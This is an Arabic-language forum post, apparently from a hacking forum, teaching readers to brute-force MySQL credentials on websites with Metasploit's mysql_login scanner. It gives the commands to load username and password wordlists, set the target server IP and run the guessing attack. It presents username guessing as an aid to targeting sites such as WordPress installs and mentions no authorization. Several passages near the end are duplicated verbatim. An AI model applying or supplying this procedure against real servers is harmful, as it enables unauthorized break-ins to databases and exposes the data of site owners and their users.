09-03-2021, 10:06 AM
السلام عليكم ورحمة الله وبركاته
شرح التخمين على قواعد بيانات - Mysql
في هذا الشرح راح نستخدم مشروع الميتا سبلويت
ويفيدنى التخمين في الاستهداف
على سبيل المثال معنا موقع ويوزره : user
في الغالب بيكون اسم المستخدم لقاعدة البيانات هو : user_wp
السكربت هو وورد بريس كمثال ...
^
كمثال مو شرط يكون على طول كذا
طيب الحين نفتح الميتاسبلويت ونكتب الامر :
use auxiliary/scanner/mysql/mysql_login
![[صورة: p_2072yd8651.png]](https://h.top4top.io/p_2072yd8651.png)
نظهر الاعدادات :
show options
![[صورة: p_2072133d61.png]](https://f.top4top.io/p_2072133d61.png)
الحين نضبط مسار لستة اليوزرات :
set USER_FILE /home/cyber/Desktop/user.txt
+
نضبط مسار لستة الباسووردات :
set PASS_FILE /home/cyber/Desktop/pass.txt
![[صورة: p_2072y4k271.png]](https://d.top4top.io/p_2072y4k271.png)
show options
الحين نضبط مسار لستة اليوزرات :
set USER_FILE /home/cyber/Desktop/user.txt
+
نضبط مسار لستة الباسووردات :
set PASS_FILE /home/cyber/Desktop/pass.txt
نجي لتحديد ايبي السيرفر بالامر :
set RHOSTS ipserver
^
بدل كلمة : ipserver تضع ايبي السيرفر
والامر االاخير لتشغيل الاداة والتخمين على Mysql :
run
بالحاله هذي يبدا يخمن على قاعدة البيانات
وحسب لستة اليوزرات والباسووردات اللي تخمن فيها
واذا وقف وما خمن .. بالحاله هذي السيرفر مانع التخمين على mysql
قاعدة البيانات
وسلامتكم ... في آمان الله
https://www.twitter.com/Ht4ccess
set RHOSTS ipserver
^
بدل كلمة : ipserver تضع ايبي السيرفر
والامر االاخير لتشغيل الاداة والتخمين على Mysql :
run
بالحاله هذي يبدا يخمن على قاعدة البيانات
وحسب لستة اليوزرات والباسووردات اللي تخمن فيها
واذا وقف وما خمن .. بالحاله هذي السيرفر مانع التخمين على mysql
قاعدة البيانات
وسلامتكم ... في آمان الله
https://www.twitter.com/Ht4ccess